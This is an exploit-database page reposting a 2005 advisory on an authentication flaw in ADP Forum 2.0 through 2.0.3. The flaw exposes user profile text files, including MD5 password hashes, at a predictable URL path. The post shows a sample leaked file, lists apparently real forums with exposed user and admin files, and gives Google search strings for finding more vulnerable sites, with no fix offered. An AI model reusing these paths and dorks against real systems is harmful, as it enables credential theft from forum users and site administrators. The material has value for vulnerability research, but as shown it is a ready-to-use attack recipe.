Advertisement






ADP Forum 2.0,ADP Forum 2.0.1,ADP Forum 2.0.2,ADP Forum 2.0.3 versiyon user md5 hash bug

CVE Category Price Severity
CWE-287 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2005-12-14
CPE
cpe:cpe:/a:adp:forum:2.0, cpe:/a:adp:forum:2.0.1, cpe:/a:adp:forum:2.0.2, cpe:/a:adp:forum:2.0.3
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005120033

Below is a copy:

ADP Forum 2.0,ADP Forum 2.0.1,ADP Forum 2.0.2,ADP Forum 2.0.3  versiyon user md5 hash bug

----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.e-stamp.ru/forum203/

--------------------------------------------------

http://target.com/pacth/users/username.txt

----------------------------------------------------

username.txt file
 
 
username
Master Member
52
images/avatars/1037850652.jpg
http://www.website.com
wamp (at) website (dot) com [email concealed]
176311476
20-11-2002
username
1f8c48c0c6e421b907e72ab6d4aa8ca9
1037850652

--------------------------------------------------------
example:

http://www.wamp.ca/forum/users/Paul.txt
http://www.wamp.ca/forum/users/javadog.txt
http://www.e-stamp.ru/forum203/users/admin.txt

vs..

---------------------------------------------------------

Credit:Liz0ziM
mail:liz0 (at) bsdmail (dot) com [email concealed]
www.biyo.tk,www.cehennem.org

-----------------------------------------------------------

http://www.blogcu.com/Liz0ziM/144336/
http://biyo.5gigs.com/adpforum.txt

------------------------------------------------------------
google:

"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum